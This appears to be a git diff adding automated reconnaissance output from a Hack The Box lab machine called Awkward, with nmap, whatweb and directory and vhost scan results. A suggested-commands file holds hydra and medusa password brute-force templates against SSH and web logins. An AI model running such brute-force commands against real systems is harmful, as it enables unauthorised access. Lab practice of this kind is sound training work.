HTB/awkward/results/awkward.htb/scans/_commands.log Normal file
View File

@@ -0,0 +1,32 @@
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_quick_tcp_nmap.xml" awkward.htb
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_full_tcp_nmap.xml" awkward.htb
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_top_100_udp_nmap.xml" awkward.htb
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml" awkward.htb
feroxbuster -u http://awkward.htb:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://awkward.htb:80/.well-known/security.txt
curl -sSikf http://awkward.htb:80/robots.txt
curl -sSik http://awkward.htb:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/xml/tcp_80_http_nmap.xml" awkward.htb
curl -sk -o /dev/null -H "Host: rWvDCpAWlRnZAXFIltAG.awkward.htb" http://awkward.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://awkward.htb:80 2>&1
wkhtmltoimage --format png http://awkward.htb:80/ /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://awkward.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.awkward.htb" -fs 132 -noninteractive -s | tee "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_awkward.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_quick_tcp_nmap.xml" awkward.htb
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_full_tcp_nmap.xml" awkward.htb
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/awkward/results/awkward.htb/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/awkward/results/awkward.htb/scans/xml/_top_100_udp_nmap.xml" awkward.htb

10
HTB/awkward/results/awkward.htb/scans/_errors.log Normal file
View File

@@ -0,0 +1,10 @@
[*] Service scan wkhtmltoimage (tcp/80/http/wkhtmltoimage) ran a command which returned a non-zero exit code (1).
[-] Command: wkhtmltoimage --format png http://awkward.htb:80/ /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_screenshot.png
[-] Error Output:
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
Loading page (1/2)
[> ] 0%
[==================> ] 30%
[============================================================] 100%
Error: Failed to load http://hat-valley.htb/, with network status code 3 and http status code 0 - Host hat-valley.htb not found
[============================================================] 100%

1
HTB/awkward/results/awkward.htb/scans/_full_tcp_nmap.txt Normal file
View File

@@ -0,0 +1 @@
# Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/awkward/results/awkward.htb/scans/_full_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_full_tcp_nmap.xml awkward.htb

32
HTB/awkward/results/awkward.htb/scans/_manual_commands.txt Normal file
View File

@@ -0,0 +1,32 @@
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://awkward.htb
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h awkward.htb
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://awkward.htb:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://awkward.htb/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h awkward.htb -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://awkward.htb/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h awkward.htb -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://awkward.htb:80 2>&1 | tee "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://awkward.htb:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_wpscan.txt"

1
HTB/awkward/results/awkward.htb/scans/_quick_tcp_nmap.txt Normal file
View File

@@ -0,0 +1 @@
# Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/awkward/results/awkward.htb/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_quick_tcp_nmap.xml awkward.htb

1
HTB/awkward/results/awkward.htb/scans/_top_100_udp_nmap.txt Normal file
View File

@@ -0,0 +1 @@
# Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/kali/htb/awkward/results/awkward.htb/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_top_100_udp_nmap.xml awkward.htb

60
HTB/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_nmap.txt Normal file
View File

@@ -0,0 +1,60 @@
# Nmap 7.93 scan initiated Tue Feb 7 23:18:03 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml awkward.htb
Nmap scan report for awkward.htb (10.10.11.185)
Host is up, received user-set (0.038s latency).
Scanned at 2023-02-07 23:18:03 CET for 2s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3
| ssh2-enum-algos:
| kex_algorithms: (10)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| sntrup761x25519-sha512@openssh.com
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (4)
| rsa-sha2-512
| rsa-sha2-256
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-hostkey:
| 256 7254afbaf6e2835941b7cd611c2f418b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCMaN1wQtPg5uk2w3xD0d0ND6JQgzw40PoqCSBDGB7Q0/f5lQSGU2eSTw4uCdL99hdM/+Uv84ffp2tNkCXyV8l8=
| 256 59365bba3c7821e326b37d23605aec38 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFsq9sSC1uhq5CBWylh+yiC7jz4tuegMj/4FVTp6bzZy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 7 23:18:05 2023 -- 1 IP address (1 host up) scanned in 1.63 seconds

95
HTB/awkward/results/awkward.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml Normal file
View File

@@ -0,0 +1,95 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Feb 7 23:18:03 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml awkward.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml awkward.htb" start="1675808283" startstr="Tue Feb 7 23:18:03 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="22"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675808283"/>
<taskend task="NSE" time="1675808283"/>
<taskbegin task="NSE" time="1675808283"/>
<taskend task="NSE" time="1675808283"/>
<taskbegin task="SYN Stealth Scan" time="1675808283"/>
<taskend task="SYN Stealth Scan" time="1675808283" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1675808284"/>
<taskend task="Service scan" time="1675808284" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1675808284"/>
<taskend task="NSE" time="1675808285"/>
<taskbegin task="NSE" time="1675808285"/>
<taskend task="NSE" time="1675808285"/>
<host starttime="1675808283" endtime="1675808285"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.185" addrtype="ipv4"/>
<hostnames>
<hostname name="awkward.htb" type="user"/>
<hostname name="awkward.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.9p1 Ubuntu 3" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.9p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="banner" output="SSH-2.0-OpenSSH_8.9p1 Ubuntu-3"/><script id="ssh2-enum-algos" output="&#xa; kex_algorithms: (10)&#xa; curve25519-sha256&#xa; curve25519-sha256@libssh.org&#xa; ecdh-sha2-nistp256&#xa; ecdh-sha2-nistp384&#xa; ecdh-sha2-nistp521&#xa; sntrup761x25519-sha512@openssh.com&#xa; diffie-hellman-group-exchange-sha256&#xa; diffie-hellman-group16-sha512&#xa; diffie-hellman-group18-sha512&#xa; diffie-hellman-group14-sha256&#xa; server_host_key_algorithms: (4)&#xa; rsa-sha2-512&#xa; rsa-sha2-256&#xa; ecdsa-sha2-nistp256&#xa; ssh-ed25519&#xa; encryption_algorithms: (6)&#xa; chacha20-poly1305@openssh.com&#xa; aes128-ctr&#xa; aes192-ctr&#xa; aes256-ctr&#xa; aes128-gcm@openssh.com&#xa; aes256-gcm@openssh.com&#xa; mac_algorithms: (10)&#xa; umac-64-etm@openssh.com&#xa; umac-128-etm@openssh.com&#xa; hmac-sha2-256-etm@openssh.com&#xa; hmac-sha2-512-etm@openssh.com&#xa; hmac-sha1-etm@openssh.com&#xa; umac-64@openssh.com&#xa; umac-128@openssh.com&#xa; hmac-sha2-256&#xa; hmac-sha2-512&#xa; hmac-sha1&#xa; compression_algorithms: (2)&#xa; none&#xa; zlib@openssh.com"><table key="kex_algorithms">
<elem>curve25519-sha256</elem>
<elem>curve25519-sha256@libssh.org</elem>
<elem>ecdh-sha2-nistp256</elem>
<elem>ecdh-sha2-nistp384</elem>
<elem>ecdh-sha2-nistp521</elem>
<elem>sntrup761x25519-sha512@openssh.com</elem>
<elem>diffie-hellman-group-exchange-sha256</elem>
<elem>diffie-hellman-group16-sha512</elem>
<elem>diffie-hellman-group18-sha512</elem>
<elem>diffie-hellman-group14-sha256</elem>
</table>
<table key="server_host_key_algorithms">
<elem>rsa-sha2-512</elem>
<elem>rsa-sha2-256</elem>
<elem>ecdsa-sha2-nistp256</elem>
<elem>ssh-ed25519</elem>
</table>
<table key="encryption_algorithms">
<elem>chacha20-poly1305@openssh.com</elem>
<elem>aes128-ctr</elem>
<elem>aes192-ctr</elem>
<elem>aes256-ctr</elem>
<elem>aes128-gcm@openssh.com</elem>
<elem>aes256-gcm@openssh.com</elem>
</table>
<table key="mac_algorithms">
<elem>umac-64-etm@openssh.com</elem>
<elem>umac-128-etm@openssh.com</elem>
<elem>hmac-sha2-256-etm@openssh.com</elem>
<elem>hmac-sha2-512-etm@openssh.com</elem>
<elem>hmac-sha1-etm@openssh.com</elem>
<elem>umac-64@openssh.com</elem>
<elem>umac-128@openssh.com</elem>
<elem>hmac-sha2-256</elem>
<elem>hmac-sha2-512</elem>
<elem>hmac-sha1</elem>
</table>
<table key="compression_algorithms">
<elem>none</elem>
<elem>zlib@openssh.com</elem>
</table>
</script><script id="ssh-auth-methods" output="&#xa; Supported authentication methods: &#xa; publickey&#xa; password"><table key="Supported authentication methods">
<elem>publickey</elem>
<elem>password</elem>
</table>
</script><script id="ssh-hostkey" output="&#xa; 256 7254afbaf6e2835941b7cd611c2f418b (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCMaN1wQtPg5uk2w3xD0d0ND6JQgzw40PoqCSBDGB7Q0/f5lQSGU2eSTw4uCdL99hdM/+Uv84ffp2tNkCXyV8l8=&#xa; 256 59365bba3c7821e326b37d23605aec38 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFsq9sSC1uhq5CBWylh+yiC7jz4tuegMj/4FVTp6bzZy"><table>
<elem key="fingerprint">7254afbaf6e2835941b7cd611c2f418b</elem>
<elem key="bits">256</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCMaN1wQtPg5uk2w3xD0d0ND6JQgzw40PoqCSBDGB7Q0/f5lQSGU2eSTw4uCdL99hdM/+Uv84ffp2tNkCXyV8l8=</elem>
</table>
<table>
<elem key="fingerprint">59365bba3c7821e326b37d23605aec38</elem>
<elem key="bits">256</elem>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIFsq9sSC1uhq5CBWylh+yiC7jz4tuegMj/4FVTp6bzZy</elem>
</table>
</script></port>
</ports>
<times srtt="38036" rttvar="38036" to="190180"/>
</host>
<taskbegin task="NSE" time="1675808285"/>
<taskend task="NSE" time="1675808285"/>
<taskbegin task="NSE" time="1675808285"/>
<taskend task="NSE" time="1675808285"/>
<runstats><finished time="1675808285" timestr="Tue Feb 7 23:18:05 2023" summary="Nmap done at Tue Feb 7 23:18:05 2023; 1 IP address (1 host up) scanned in 1.63 seconds" elapsed="1.63" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

0
HTB/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_awkward.htb_vhosts_subdomains-top1million-110000.txt Normal file
View File

19
HTB/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_curl.html Normal file
View File

@@ -0,0 +1,19 @@
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 07 Feb 2023 22:18:04 GMT
Content-Type: text/html
Content-Length: 132
Last-Modified: Thu, 15 Sep 2022 12:33:07 GMT
Connection: keep-alive
ETag: "63231b83-84"
Accept-Ranges: bytes
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Refresh" content="0; url='http://hat-valley.htb'" />
</head>
<body>
</body>
</html>

1
HTB/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt Normal file
View File

@@ -0,0 +1 @@
200 GET 8l 13w 132c http://awkward.htb/

1
HTB/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_nmap.txt Normal file
View File

@@ -0,0 +1 @@
# Nmap 7.93 scan initiated Tue Feb 7 23:18:03 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/xml/tcp_80_http_nmap.xml awkward.htb

47
HTB/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_whatweb.txt Normal file
View File

@@ -0,0 +1,47 @@
WhatWeb report for http://awkward.htb:80
Status : 200 OK
Title : <None>
IP : 10.10.11.185
Country : RESERVED, ZZ
Summary : HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], Meta-Refresh-Redirect[http://hat-valley.htb], nginx[1.18.0]
Detected Plugins:
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : nginx/1.18.0 (Ubuntu) (from server string)
[ Meta-Refresh-Redirect ]
Meta refresh tag is a deprecated URL element that can be
used to optionally wait x seconds before reloading the
current page or loading a new page. More info:
https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh
String : http://hat-valley.htb
[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.
Version : 1.18.0
Website : http://nginx.net/
HTTP Headers:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 07 Feb 2023 22:18:06 GMT
Content-Type: text/html
Last-Modified: Thu, 15 Sep 2022 12:33:07 GMT
Transfer-Encoding: chunked
Connection: close
ETag: W/"63231b83-84"
Content-Encoding: gzip

17
HTB/awkward/results/awkward.htb/scans/tcp80/xml/tcp_80_http_nmap.xml Normal file
View File

@@ -0,0 +1,17 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Feb 7 23:18:03 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/xml/tcp_80_http_nmap.xml awkward.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/tcp80/xml/tcp_80_http_nmap.xml awkward.htb" start="1675808283" startstr="Tue Feb 7 23:18:03 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="80"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675808283"/>
<taskend task="NSE" time="1675808283"/>
<taskbegin task="NSE" time="1675808283"/>
<taskend task="NSE" time="1675808283"/>
<taskbegin task="NSE" time="1675808283"/>
<taskend task="NSE" time="1675808283"/>
<taskbegin task="SYN Stealth Scan" time="1675808283"/>
<taskend task="SYN Stealth Scan" time="1675808284" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1675808284"/>

15
HTB/awkward/results/awkward.htb/scans/xml/_full_tcp_nmap.xml Normal file
View File

@@ -0,0 +1,15 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/awkward/results/awkward.htb/scans/_full_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_full_tcp_nmap.xml awkward.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/awkward/results/awkward.htb/scans/_full_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_full_tcp_nmap.xml awkward.htb" start="1675808315" startstr="Tue Feb 7 23:18:35 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="SYN Stealth Scan" time="1675808315"/>

17
HTB/awkward/results/awkward.htb/scans/xml/_quick_tcp_nmap.xml Normal file
View File

@@ -0,0 +1,17 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/awkward/results/awkward.htb/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_quick_tcp_nmap.xml awkward.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/awkward/results/awkward.htb/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_quick_tcp_nmap.xml awkward.htb" start="1675808315" startstr="Tue Feb 7 23:18:35 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,2350